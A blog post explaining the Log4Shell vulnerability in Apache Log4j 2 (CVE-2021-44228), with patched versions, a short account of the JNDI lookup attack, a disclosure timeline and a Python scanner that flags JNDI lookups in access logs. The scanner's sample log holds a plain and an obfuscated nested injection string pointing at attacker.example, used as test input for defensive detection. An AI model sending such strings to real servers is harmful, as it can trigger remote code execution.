Remote Code Execution in Java Apache Log4j 2 (CVE-2021-44228)

Hello World!

The Internet was rattled over the last couple of days by a new critical bug found in a very ubiquitous library; currently known vulnerable versions include, but may not be limited to, Apache Log4j versions 2.10 to 2.14.1. Patches are now mostly available and should be installed as soon as possible: CVE-2021-44228 is currently being exploited in the wild, and there has even been a case of Log4j payloads being used to deliver a crypto miner.

Edit 4th January 2022: Updated mitigation information, current secure versions are as follows: Log4j 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6)

JNDI – Java Naming and Directory Interface.

LDAP – Lightweight Directory Access Protocol.

A basic flow chart to illustrate the attack methods. Credit: Fastly

Here’s a brief explanation of the exploit from an attacker's perspective… An attacker-controlled value is passed to the logging library; the attacker then abuses the string interpolation (lookup) feature inside Log4j to trigger object deserialization, which creates the conditions for remote code execution on the server. To put this simply for others, this allows the attacker to execute their own code on the server, essentially letting them do anything… (But this will depend on the attacker's skill level.)

Since the 9th of December the cyber security world has been scrambling to mitigate this vulnerability. There are configuration options that will let you disable the functionality that results in this vulnerability, but that is likely only a temporary fix. Update the vulnerable library if you are able to, but many people will have to wait for individual patches from the vendors of their products.
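While waiting for vendor patches, one thing a defender can do is sweep existing logs for the lookup strings this bug relies on. Because Log4j evaluates nested lookups before the outer one, a detector has to collapse nesting the same way before checking for `${jndi:`. The following is an added example of that check, not code from the original post or from the Log4j project; the log lines and the host name attacker.example are constructed for the demonstration.

```python
import re

# Innermost lookup: a ${...} with no further "${" inside the braces.
INNER = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_one(body: str) -> str:
    """Evaluate one innermost lookup the way Log4j would before the outer
    lookup sees it: lower/upper transform their argument, and any lookup
    carrying a ':-' default falls back to that default text."""
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return body  # unknown lookup: keep its text, drop the ${ } wrapper


def contains_jndi_lookup(text: str, max_rounds: int = 10) -> bool:
    """True if the text contains a JNDI lookup, directly or after collapsing
    nested lookups. Nesting deeper than max_rounds is flagged for review."""
    for _ in range(max_rounds):
        if JNDI.search(text):
            return True
        collapsed = INNER.sub(lambda m: _resolve_one(m.group(1)), text)
        if collapsed == text:
            return False  # nothing left to collapse and no JNDI lookup seen
        text = collapsed
    return "${" in text  # still unresolved after the bound: treat as suspicious


# Constructed web-server access log: one benign request, one plain lookup,
# one lookup hidden behind nested lower: lookups.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"
203.0.113.9 - - [10/Dec/2021:10:02:30 +0000] "GET /login HTTP/1.1" 302 0 "-" "${${lower:j}ndi:${lower:ldap}://attacker.example/a}"
"""


def find_jndi_lines(log_text: str) -> list[tuple[int, str]]:
    """Return (line_number, line) for every log line carrying a JNDI lookup."""
    return [(n, line) for n, line in enumerate(log_text.splitlines(), 1)
            if contains_jndi_lookup(line)]


if __name__ == "__main__":
    for number, line in find_jndi_lines(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

Run it over a real access log by reading the file into find_jndi_lines; the regexes only look at the text, so the log format does not matter.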

On November 24, 2021, Apache was notified about the Log4j remote code execution vulnerability by the Alibaba Cloud Security team. The exploit proof of concept was then posted to Github at 15:32 GMT on December 9, 2021, and we saw the first attempts to trigger callbacks 82 minutes later.

I also received my YubiKeys around the same time, which I haven’t completed setting up yet but plan to have a post about them up soon; it won’t be highly technical as I more want to sell the technology and get the point across why you should be using MFA and/or security keys.

Sources: https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j & Bishop Fox/YouTube